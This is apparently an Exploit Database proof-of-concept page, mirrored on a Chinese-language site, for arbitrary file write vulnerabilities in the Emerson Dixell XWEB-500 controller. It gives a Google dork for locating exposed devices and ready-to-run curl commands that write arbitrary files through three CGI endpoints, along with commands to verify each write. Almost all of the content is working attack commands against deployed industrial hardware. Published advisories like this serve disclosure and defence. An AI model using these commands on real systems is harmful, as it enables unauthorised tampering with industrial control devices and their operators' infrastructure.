Dixell XWEB 500 – Arbitrary File Write

• Exploit Database
• 14 阅读

• 作者： Roberto Palamaro
  日期： 2022-01-05
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50639/

• # Exploit Title: Dixell XWEB-500 - Arbitrary File Write
  # Google Dork: inurl:"xweb500.cgi"
  # Date: 03/01/2022
  # Exploit Author: Roberto Palamaro
  # Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
  # Version: XWEB-500
  # Tested on: Dixell XWEB-500
  # References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
  
  # Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
  
  # Endpoint: logo_extra_upload.cgi
  # Here the first line of the POC is the filename and the second one is the content of the file be written
  # Write file
  echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
  # Verify
  curl -A Chrome -is "http://[target]:[port]/logo/"
  
  # Endpoint: lo_utils.cgi
  # Here ACTION=5 is to enable write mode
  echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' 
  # Verify using ACTION=3 to listing resources
  echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
  
  # Endpoint: cal_save.cgi
  # Here the first line of the POC is the filename and the second one is the content of the file be written
  echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
  # Verify
  curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi